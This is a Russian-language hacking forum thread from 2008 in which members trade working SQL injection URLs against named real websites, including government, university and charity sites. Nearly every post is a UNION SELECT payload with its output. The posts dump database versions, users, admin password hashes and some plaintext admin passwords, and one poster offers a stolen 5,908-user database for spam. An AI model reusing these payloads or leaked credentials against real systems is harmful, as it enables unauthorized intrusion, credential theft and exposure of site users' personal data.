SQL Инъекции

swt1 · 29 Jun 2008

http://zito.mvs.gov.ua/?page=3&id=-639+union+select+1,2,3,4,5,6,7/*

Petr · 29 Jun 2008

http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,4,5/*

Админка
http://www.bocharik.ru/admin

Версия
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(version()+using+koi8r),5/*

Юзер
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(user()+using+koi8r),5/*

Имя бд
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(DATABASE()+using+koi8r),5/*

Спасибо, nex0 je0n

http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(concat_ws(0x3a,userna me,user_password)+using+koi8r),5+from+phpbb_users+ where+user_level=1+limit+0,1/*
/admin/ - пасс от форума,которого нет, подойдет к админке
Bocharik:94edcb5a40e5cb07f1428ded09fc62b7:gjlpfvrj v
to /admin/ - admin:gjlpfvrjv

gisTy · 29 Jun 2008

PR 2

http://jptweb.com/projects/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database())/*
Click to expand...

version(): 5.0.24a-standard-log
user(): [email protected]
database(): jpthome

http://jptweb.com/projects/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+null,2,3,4,concat(username,0x3a,password)+from+jos_users/*
Click to expand...

admin:9b9b2642fd71dc42744cba369fb22120

PR 2

http://www.pinkladylegend.com/index.php?option=com_jabode&task=sign&sign=taurus&id=-3+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database())--&Itemid=3
Click to expand...

version(): 5.0.58
user(): pinklady@localhost
database(): pinklady

http://www.pinkladylegend.com/index.php?option=com_jabode&task=sign&sign=taurus&id=-3+union+select+1,2,3,4,concat(username,0x3a,password)+FROM+jos_users--&Itemid=3
Click to expand...

admin:9f751204e5080f66b7c5d77c0791ca8d:3wmSYj6vHBRkaick

PR 2

http://www.l2u.co.uk/index.php?option=com_jabode&task=sign&sign=leo&id=-2+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database())&Itemid=151
Click to expand...

version(): 4.1.20-community-nt
user(): locallytoyou@localhost
database(): locallytoyou

PR 2

http://soulwithstyle.com/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database())--
Click to expand...

version(): 5.0.24a-standard-log
user(): [email protected]
database(): soul

http://soulwithstyle.com/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat(username,0x3a,password)+from+jos_users--
Click to expand...

admin:0f138c43fd44179b1380f1f0aaf88e3c:NGLGxwIecZYqjkOM

PR 0 ='(

http://charlestownalumni.net/cms/index.php?option=com_jabode&task=sign&sign=capricorn&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database())--
Click to expand...

version(): 4.1.22-standard
user(): chsalum_joom1@localhost
database(): chsalum_joom1

http://charlestownalumni.net/cms/index.php?option=com_jabode&task=sign&sign=capricorn&id=-4+union+select+1,2,3,4,concat(username,0x3a,password)+FROM+jos_users--
Click to expand...

chsalum:7e027f88756af54c4e987d13395b7fbf:ZjMUi8erHWoIxFey

PR 0 ='(

http://www.latvianusa.com/index.php?option=com_jabode&task=sign&sign=sagittarius&id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database())--&Itemid=999
Click to expand...

version(): 4.1.22-standard
user(): latvianu_jUser@localhost
database(): latvianu_joomlaDB

n3m0 · 29 Jun 2008

PR 0

http://jacellular.com/main/index.php?option=com_jabode&task=sign&sign=cancer&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(),%20user(),database())--
Click to expand...

version() : 5.0.45-community-log
user() : jacellul_joom1@localhost
database() : jacellul_joom1

thnx to gisTy

SUBJECT617 · 29 Jun 2008

http://cjcity.ru/base/song.php?id=1'+UNION+SELECT+1,2,3,concat_ws(0x3a,username,password,icq,email),5+from+users/*
Click to expand...

Лиса аж подвисла ненадолго от кол-ва или хз от чего =)

Если кому уж очень надо эту базу(5908 юзверей) (для спама или вообще хз для чего) то просто стукните в личку я скину в .txt... Ну думаю никому и не надо

Buffalon · 29 Jun 2008

http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+and+1=2+union+select+1,2,version(),4,5,user(),7,8,9,10
cпс jokester
НИмогу капнутЬ дальше
version(): 4.1.21
user() :rgufk@localhost

last_root · 29 Jun 2008

Code:

 http://www.bedro1075.co.kr/bbs1/login.php?id=issue&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&s_url=%2Fbbs1%2Fview.php%3Fid%3Dissue%26no%3D2

дальше не знаю как- я еще ток начал....

gisTy · 30 Jun 2008

PR 4
определяем кол-во колонок:

http://www.loglar.com/song.php?id=12198+order+by+8/*
Click to expand...

но при запросе

http://www.loglar.com/song.php?id=-12198+union+select+1,2,3,4,5,6,7,8/*
Click to expand...

нам ничего не выводит, так как вывод ошибок отключен.. следовательно можно предположить что версия мускула - 3.ъ, т.к. в ней не былшо конструкции union.. кто раскрутит до конца отпишитесь, просто самому уже интересно

PR 4

http://www.lyricsprovider.com/song.php?id=-3377+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database())--
Click to expand...

version(): 5.0.51-2.dotdeb.0-log
user(): lyricsprovider@localhost
database(): lyricsprovider

http://www.lyricsprovider.com/song.php?id=-3377+union+select+1,2,3,null,null,6,concat_ws(0x3a3a,fldAuto,name,pwd,admin,emailaddress,fullname)+from+lyricsprovider.ads_user--
Click to expand...

3 юзверя..

http://www.lyricsprovider.com/song.php?id=-3377+union+select+1,2,3,null,null,6,concat_ws(0x2e,guest_email)+from+lyricsprovider.guests--
Click to expand...

вот тут уже побольше будет, но тут в основном тольок мыльники

PR 3

http://www.harptabs.com/song.php?ID=-164+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,version(),user(),database()),10,11,12,13,14,15,16,17/*
Click to expand...

version(): 5.0.45-community-log
user(): harptabs_harptab@localhost
database(): harptabs_com

http://www.harptabs.com/song.php?ID=-164+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,Username,Password,Email),10,11,12,13,14,15,16,17+from+harptabs_com.Member+limit+5939,1/*
Click to expand...

в базе 5939 записи=) сливайте, юзайте=)

PR 3

http://www.vietsky.com/music/song.php?id=-6254+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
Click to expand...

version(): 4.1.22-standarđlog
user(): vietsky_khoalan@localhost
database(): vietsky_music

PR 2

http://demoscene.stg7.net/lyrics/song.php?id=-50+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11/*
Click to expand...

version():5.0.24a-standard-log
user(): [email protected]
dtatabase(): demolyrics

PR 2

http://duhovskoi.ru/songs/song.php?id=-38+union+select+1,2,3,4,concat_ws(0x3a3a3a,version(),user(),database()),6,7,8,9/*
Click to expand...

version(): 4.1.21-community-max-nt-log
user(): [email protected]
database(): 1gb_duhovskoi

PR 0 ='(

http://fungens.com/generators/poll/poll.php?action=show_results&poll_id=-13+union+select+concat_ws(0x3a3a,version(),user(),database()),2/*
Click to expand...

version(): 5.0.45-log
user():[email protected]
database(): db225707050
бд почти пустая.. там есть одна табличка.. да и та не интересная..

DDoSька · 30 Jun 2008

PR: 1
Code:
http://www.oke.ru/xo4u.php?id=-42708+union+select+1,2,3,4,5,6,7,8,9,10/*
Code:
http://www.oke.ru/xo4u.php?id=-42708+union+select+1,2,version(),4,User(),6,7,8,9,10/*
User:gsokecomru@localhost
Version:5.1.16-beta-log
-------------------------------------------------------------
PR: 7
Code:
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,2,3,4,5,6,7/*
Code:
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,version(),user(),4,5,6,7/*
User:[email protected]
Version:5.0.45-log
-------------------------------------------------------------
PR: 7
Code:
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-240+union+select+1,2/*
Code:
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-240+union+select+user(),version()/*
User:[email protected]
Version:4.0.24-standard-log
-------------------------------------------------------------
MSSQL_InJection:
PR: 6
Code:
http://www.thechicagocouncil.org/dynamic_page.php?id=64'
-------------------------------------------------------------
PR: 6
Code:
http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,unhex(hex(concat_ws(0x3a,Version(),user()))),4,5,6,7,8,9,10,11/*
User:wfsj@localhost
Version:4.1.7-nt
-------------------------------------------------------------
PR: 5
Code:
http://www.thejerusalemfund.org/images/informationbrief.php?ID=-192+union+select+concat_ws(0x3a,version(),user())/*
User:hijab@localhost
Version:4.0.27-log
-------------------------------------------------------------
PR: 6
Code:
http://www.choices.edu/resources/detail.php?id=-49+union+select+1,convert(concat_ws(0x3a,version(),user())+using+latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
User:[email protected]
Version:4.1.14-log
-------------------------------------------------------------
PR: 6
Code:
http://www.allianceforbiz.com/events/specific_event.php?id=-89+union+select+concat_ws(0x3a,version(),user()),2,3,4,5,6,7,8,9/*
User:alliance_shows@localhost
Version:4.1.22-standard
-------------------------------------------------------------
PR: 5
http://www.fip.org/CONGRESS/beijing2007/index.php?id=-600+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Code:
http://www.fip.org/CONGRESS/beijing2007/index.php?id=-600+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
User:fip@localhost
Version:4.1.20
---------------------------------------------------------------
PR: 6
Code:
http://www.eutrainingsite.com/open_details.php?id=-19+union+select+1,version(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*
Version:5.0.22-Debian_0ubuntu6.06.10-log
User:eutrsite@localhost
Все таблицы:
Code:
http://www.eutrainingsite.com/open_details.php?id=-19+union+select+1,table_name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+information_schema.tables+limit+18,1/*
Тут порядком 60 мыльников:
http://www.eutrainingsite.com/open_details.php?id=-19+union+select+1,concat_ws(0x3a,id,email,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+cusers+where+id=1/*
[email protected]:comm08em
----------------------------------------------------------------
Code:
http://www.michaelpollan.com/article.php?id=-87+union+select+1,2,3,4,5,6,7,8,9,10/*
-----------------------------------------------------------------
PR: 5
Code:
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(version()+using+latin1),5,6,7,8,9,10,11/*
Code:
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,concat_ws(0x3a,id,username,password,email),5,6,7,8,9,10,11+from+users+where+id=1/*
admin:4dm1n {админку я так и не нашел,может пароль к ftp подойдет,но я даже пробовал =)}
----------------------------------------------------------------
http://www.clasp.org/publications.php?id=-6+union+select+1,2,version(),4,5,6,7,8,9,10,1,1,1,1,1/*

#urbaner · 30 Jun 2008

http://www.phpbuddy.com/article.php?id=999999999+union+select+1,2,3,4,5,6/*
Click to expand...

Поля и таблицы не смог подобрать

n3m0 · 30 Jun 2008

ukrgazeta.plus.org.ua

PR 3

http://ukrgazeta.plus.org.ua/print.php?ida=99999999999+union+select+1,2,3,user(),version(),database()/*
Click to expand...

Подобрал только одну таблицу: article(ida,text)

SUBJECT617 · 30 Jun 2008

http://nn-photo.ru/photo.php?id=-1+union+select+1,2,3,table_name,5+from+information_schema.tables+where+table_name+like+0x257573657225/*
Click to expand...

http://nn-photo.ru/photo.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,user_password,user_email,user_icq),5+from+piter_phpbb_users/*
Click to expand...

Страшный случай. Смотрим в исходном коде Лучше для этого юзать SQL inj tools ИМХО

sabe · 30 Jun 2008

SUBJECT617

http://nn-photo.ru/photo.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,user_password,user_email,user_icq),5+from+nn_phpbb_users/*
Click to expand...

вот это правильная база.)

agamemn0n

http://www.abc-english-grammar.com/forum/questions.asp?lesson=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('views'))--
Click to expand...

продолжай..)

gisTy · 1 Jul 2008

sabe said:

agamemn0n
продолжай..)
Click to expand...

может я чего то не понимаю, но ты перейди по той ссылке, что ты дал..
там вообще есть возможность инъекта?

sabe · 1 Jul 2008

HairStylesDesign.com - PR 5

http://www.hairstylesdesign.com/gallery/fiche.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
Click to expand...

есть таблица users, но поля не угалал..(

agamemn0n · 1 Jul 2008

http://prepadav.net/view_sellers_work.php?sel=1'+union+select+user_ password+from+ phpbb_users+where+user_id='3

sabe · 1 Jul 2008

Fauvel.fr - pr 4

http://www.fauvel.fr/carrelage/web/catalogue/fiche.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5/*
Click to expand...

вывод в index:

<li><a href="3" target="_blank">4.0.18-log:fauvel_db:fauvel@localhost</a></li>
Click to expand...

#urbaner · 1 Jul 2008

http://auto.tbroker.ru/showauto.php?ID=99999999999999+union+select+1,2,3,password,login,6,7,8,USER(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+users+limit+3.1/*
Click to expand...

Это по круче будет))))Админку сами ищите

tor4) · 1 Jul 2008

www.fruity-mail.ru

http://www.fruity-mail.ru/catalog.php?id=13&subid=20%27
Click to expand...

version: 5.0.45
user: [email protected]
database: u12625_frumail

http://www.fruity-mail.ru/catalog.php?id=13&subid=20+union+select+1,concat_ws(0x3a,name,login,password,email),3+from+frumail_admins/*
Click to expand...

sabe · 1 Jul 2008

сегодня у нас .FR

Univ-paris13.fr - pr 6

http://www.univ-paris13.fr/formationsUP13/form/fiche.php?id=99999'+union+select+1,concat_ws(0x3a,version()),3/*
Click to expand...

Wildside.fr - pr 5

http://www.wildside.fr/video/fiche.php?id=999999+union+select+concat_ws(0x3a,version(),database(),user()),2,3/*
Click to expand...

Gedeonprogrammes.com - pr 5

http://www.gedeonprogrammes.com/en/fiche.php?annee=&id=999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user())/*
Click to expand...

Amis-musees.fr - pr 4

http://www.amis-musees.fr/sams/fiche.php?id=9999999+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
Click to expand...

Prettypictures.fr - p4

http://www.prettypictures.fr/fiche.php?id=999999+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Click to expand...

и еще..)

Lowriderteeshirt.ch pr 5

http://www.lowriderteeshirt.ch/Fiche.php?Rub=TSM&ID=9999999'+union+select+1,concat_ws(0x3a,username,password),3+from+emp3p_admins/*
Click to expand...

SQL Инъекции

swt1 Elder - Старейшина

Petr Banned

gisTy Elder - Старейшина

n3m0 Elder - Старейшина

SUBJECT617 Elder - Старейшина

Buffalon Elder - Старейшина

last_root Elder - Старейшина

gisTy Elder - Старейшина

DDoSька Elder - Старейшина

#urbaner Member

n3m0 Elder - Старейшина

SUBJECT617 Elder - Старейшина

sabe Elder - Старейшина

gisTy Elder - Старейшина

sabe Elder - Старейшина

agamemn0n New Member

sabe Elder - Старейшина

#urbaner Member

tor4) Elder - Старейшина

sabe Elder - Старейшина

Useful Searches

SQL Инъекции

swt1 Elder - Старейшина

Petr Banned

gisTy Elder - Старейшина

n3m0 Elder - Старейшина

SUBJECT617 Elder - Старейшина

Buffalon Elder - Старейшина

last_root Elder - Старейшина

gisTy Elder - Старейшина

DDoSька Elder - Старейшина

#urbaner Member

n3m0 Elder - Старейшина

SUBJECT617 Elder - Старейшина

sabe Elder - Старейшина

gisTy Elder - Старейшина

sabe Elder - Старейшина

agamemn0n New Member

sabe Elder - Старейшина

#urbaner Member

tor4) Elder - Старейшина

sabe Elder - Старейшина